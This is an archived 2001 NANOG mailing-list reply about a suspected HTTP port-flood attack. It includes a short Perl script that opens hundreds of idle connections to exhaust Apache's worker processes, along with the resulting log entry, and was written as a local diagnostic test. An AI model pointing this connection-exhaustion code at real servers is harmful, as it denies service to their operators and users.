[42678] in North American Network Operators' Group
Re: Pattern matching odd HTTP request
daemon@ATHENA.MIT.EDU (Bill McGonigle)
Tue Sep 18 19:02:28 2001
Date: Tue, 18 Sep 2001 18:58:42 -0400
Mime-Version: 1.0 (Apple Message framework v468)
Cc: "Karsten W. Rohrbach" <karsten@rohrbach.de>, mike@biggorilla.com,
nanog@merit.edu
Message-Id: <B49B3647-AC88-11D5-9707-003065EAE3C0@medicalmedia.com>
In-Reply-To: <200109182231.f8IMV1aa014239@Espresso.NEEBU.Net>
Content-Type: text/plain; charset=US-ASCII; format=flowed
From: Bill McGonigle <mcgonigle@medicalmedia.com>
Content-Transfer-Encoding: 7bit
To: khuon@GBLX.Net (Jake Khuon)
Errors-To: owner-nanog-outgoing@merit.edu
On Tuesday, September 18, 2001, at 06:30 PM, Jake Khuon wrote:
>
> You start to suspect a DDOS port-flood attack. It's certainly causing
> me to
> spawn a lot of httpds and occupying a lot of ports.
>
This isn't good. I wrote a bit of test code to see what would happen if
I had alot of timeouts:
#-----
use Net::Telnet;
my $num_open = 400;
sub doConnect {
my $telnet_handle = Net::Telnet->new(Port=>'80');
$telnet_handle->open("localhost");
if ($num_open > 0) {
print "$num_open...";
$num_open--;
doConnect();
} else {
sleep(20);
}
}
doConnect();
print "\n";
#-----
On Apache 1.3, this brings the number of httpd processes up to
MaxClients, then each one waits 300 seconds (the default timeout) for
the connections to time out, at which point the other connections are
made, and the cycle continues. A DDOS of this nature would be
particularly nasty. One client (happened to be on localhost) tied up
the server for 6 minutes this way with the default Apache config.
Here's what the logfile for these attempts looks like:
127.0.0.1 - - [18/Sep/2001:18:43:06 -0400] "-" 408 -
Doh!
-----
Bill McGonigle
Research & Development
Medical Media Systems, Inc.
http://www.medicalmedia.com
+1.603.298.5509x329
